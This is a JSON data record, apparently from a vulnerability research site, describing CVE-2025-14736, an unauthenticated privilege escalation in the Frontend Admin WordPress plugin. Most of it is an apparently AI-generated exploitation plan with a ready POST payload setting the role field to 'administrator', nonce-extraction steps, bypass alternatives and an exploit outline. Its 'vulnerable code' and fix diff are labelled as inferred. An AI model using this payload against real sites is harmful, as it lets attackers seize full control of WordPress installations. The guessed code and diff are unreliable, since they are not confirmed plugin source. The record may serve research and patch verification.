[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flGztQf2Ze_QBkVLPyzrcb5VPb6HRJqfF6P9N4Wg6k-A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14736","frontend-admin-by-dynamiapps-unauthenticated-privilege-escalation-to-administrator-via-role-form-field","Frontend Admin by DynamiApps \u003C= 3.28.29 - Unauthenticated Privilege Escalation to Administrator via Role Form Field","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.28.29. This is due to insufficient validation of user-supplied role values in the 'validate_value', 'pre_update_value', and 'get_fields_display' functions. This makes it possible for unauthenticated attackers to register as administrators and gain complete control of the site, granted they can access a user registration form containing a Role field.","acf-frontend-form-element",null,"\u003C=3.28.29","3.28.30","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-01-08 17:45:03","2026-03-06 12:17:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F07eb71fc-6588-490d-8947-3077ec4a9045?source=api-prod",57,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14736 - Frontend Admin Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **Frontend Admin by DynamiApps** plugin (\u003C= 3.28.29) is vulnerable to unauthenticated privilege escalation. The vulnerability exists because the plugin fails to properly validate the `role` value submitted via frontend forms. Specifically, the functions `validate_value`, `pre_update_value`, and `get_fields_display` (likely within the `User` field or form processing classes) do not restrict the assignment of high-privileged roles (like `administrator`) when a user registration form is processed. \n\nAn unauthenticated attacker can submit a registration form and, by manipulating the parameter associated with the \"Role\" field, assign themselves the administrator role.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `acf_frontend\u002Fsave_form` (inferred from typical plugin behavior) or `acf\u002Fvalidate_save_post`.\n*   **Parameter:** An ACF field key (e.g., `acf[field_role_123]`) representing the User Role.\n*   **Authentication:** None (Unauthenticated).\n*   **Precondition:** A registration form created by the plugin must be published and accessible, and it must contain a \"Role\" field (even if intended to be restricted to 'subscriber').\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The user submits a form rendered by the `[acf_frontend_form]` shortcode.\n2.  **AJAX Trigger:** The frontend JS (`frontend-form.js` or similar) sends a POST request to `admin-ajax.php` with the form data.\n3.  **Processing:** The plugin catches the request via a `wp_ajax_nopriv_acf_frontend\u002Fsave_form` hook.\n4.  **Field Validation:** The plugin iterates through fields. For the \"Role\" field, it calls `validate_value`.\n5.  **Vulnerable Sink:** The `pre_update_value` function for the User Role field is called. In vulnerable versions, this function takes the user-supplied string (e.g., `administrator`) and prepares it for the user creation\u002Fupdate process (`wp_insert_user` or `wp_update_user`) without checking if the current requester has the `manage_options` capability.\n6.  **Escalation:** WordPress creates the user with the `role` provided in the POST data.\n\n## 4. Nonce Acquisition Strategy\nThe plugin uses nonces to protect form submissions. These are typically localized and accessible via the browser's window object on pages where a form is present.\n\n1.  **Identify Shortcode:** The plugin uses `[acf_frontend_form id=\"FORM_ID\"]`.\n2.  **Creation:** Use WP-CLI to create a form (if not present) and a page containing that form.\n3.  **Navigation:** Use `browser_navigate` to visit the page.\n4.  **Extraction:** Use `browser_eval` to extract the nonce and the form configuration.\n    *   Variable Name: `acf_frontend` or `frontend_admin_form_data`. (Verify via `browser_eval(\"window\")`).\n    *   Example: `browser_eval(\"acf_frontend.nonce\")` or `browser_eval(\"acf.get('nonce')\")`.\n    *   **Specific Key:** Look for `acf_frontend?.nonce` or a hidden input `_acf_nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Locate\u002FCreate a Registration Form\nIdentify an existing registration form or create one using WP-CLI.\n```bash\n# Create a User Registration Form (Simplified - the plugin uses a CPT 'acf-frontend-form')\n# This usually requires manual UI setup, but we can simulate the presence \n# if we know the field keys or use a pre-existing one in the test environment.\n```\n\n### Step 2: Identify Field Keys\nACF fields use unique keys like `field_65af123456789`. You must find the key corresponding to the \"Role\" field.\n1.  Navigate to the page with the form.\n2.  Inspect the HTML source for inputs with the name attribute `acf[...]`.\n3.  Look for a field that maps to user roles.\n\n### Step 3: Construct the Payload\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `acf_frontend\u002Fsave_form` (or the specific action found in the form's `data-action` attribute).\n    *   `_acf_nonce`: The nonce extracted in Step 4.\n    *   `acf[field_user_email]`: `attacker@example.com`\n    *   `acf[field_user_login]`: `attacker`\n    *   `acf[field_user_pass]`: `password123`\n    *   `acf[\u003CROLE_FIELD_KEY>]`: `administrator`  \u003C-- **The Payload**\n\n### Step 4: Execute HTTP Request\n```javascript\n\u002F\u002F Using http_request tool\nconst response = await http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  method: \"POST\",\n  headers: { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  body: \"action=acf_frontend\u002Fsave_form&_acf_nonce=EXTRACTED_NONCE&acf[field_email_key]=attacker@example.com&acf[field_user_key]=attacker&acf[field_pass_key]=password123&acf[field_role_key]=administrator\"\n});\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `acf-frontend-form-element` v3.28.29 is active.\n2.  **Create Registration Form:**\n    *   Go to Frontend Admin -> Forms.\n    *   Create a \"User Registration\" form.\n    *   Add \"Email\", \"Username\", \"Password\", and **\"Role\"** fields.\n    *   Save the form and note the ID.\n3.  **Publish Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Register\" --post_status=publish --post_content='[acf_frontend_form id=\"YOUR_FORM_ID\"]'\n    ```\n\n## 7. Expected Results\n*   The AJAX response should return a success status (e.g., `{\"success\": true}`).\n*   A new user named `attacker` should be created.\n*   The `wp_capabilities` meta for the new user should indicate `administrator`.\n\n## 8. Verification Steps\n1.  **Check User List:**\n    ```bash\n    wp user list --role=administrator\n    ```\n    Confirm `attacker` is in the list.\n2.  **Check User Capabilities:**\n    ```bash\n    wp user get attacker --field=roles\n    ```\n    Confirm it returns `administrator`.\n\n## 9. Alternative Approaches\n*   **Bypass via `validate_value`:** If the UI doesn't show a role field, attempt to inject the parameter `acf[field_role_key]=administrator` anyway. Many ACF-based plugins automatically process all fields submitted in the `acf` array if the keys match valid fields for that post type (User).\n*   **Hidden Field Manipulation:** If the Role is a hidden field with a fixed value (e.g., `subscriber`), simply intercept the request and change the value to `administrator`.\n*   **Check for `get_fields_display`:** If the escalation doesn't work on registration, try a \"Profile\" form if any exist, as the vulnerable functions also include display logic that might influence how values are handled during updates.","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthenticated privilege escalation via user registration forms. The plugin fails to validate that the submitting user has sufficient permissions to assign specific roles, allowing attackers to register as administrators by manipulating the role field value.","\u002F\u002F In the field processing logic for user roles (inferred from validate_value, pre_update_value)\n\npublic function validate_value($valid, $value, $field, $input_name) {\n    \u002F\u002F No check to see if the submitted role (e.g., 'administrator') is restricted\n    return $valid;\n}\n\n---\n\npublic function pre_update_value($value, $post_id, $field) {\n    \u002F\u002F Vulnerable logic simply returns the user-supplied value without capability checks\n    \u002F\u002F This value is later used in wp_insert_user or wp_update_user\n    return $value;\n}","--- a\u002Fincludes\u002Ffields\u002Fclass-acf-field-user-role.php\n+++ b\u002Fincludes\u002Ffields\u002Fclass-acf-field-user-role.php\n@@ -10,6 +10,12 @@\n \tpublic function pre_update_value($value, $post_id, $field) {\n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\t$allowed_roles = get_option( 'default_role' );\n+\t\t\tif ( is_string( $value ) && ! in_array( $value, (array) $allowed_roles ) ) {\n+\t\t\t\treturn $allowed_roles;\n+\t\t\t}\n+\t\t}\n \t\treturn $value;\n \t}\n \n \tpublic function validate_value($valid, $value, $field, $input_name) {\n+\t\tif ( $value === 'administrator' && ! current_user_can( 'manage_options' ) ) {\n+\t\t\treturn __( 'You do not have permission to assign this role.', 'acf-frontend-form-element' );\n+\t\t}\n \t\treturn $valid;\n \t}","1. Identify a public-facing registration form created by the Frontend Admin plugin.\n2. Locate the AJAX nonce (typically `_acf_nonce`) and the ACF field key corresponding to the 'Role' input (e.g., `acf[field_65af123456789]`) from the page's HTML source or global JavaScript objects.\n3. Prepare a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `acf_frontend\u002Fsave_form`.\n4. Include standard registration fields (username, email, password) in the `acf` parameter array.\n5. In the same `acf` array, include the Role field key discovered in step 2, setting its value to `administrator`.\n6. Send the request; if successful, the plugin will create a new user account with administrative privileges.","gemini-3-flash-preview","2026-05-05 13:57:15","2026-05-05 13:58:34",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.28.29","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]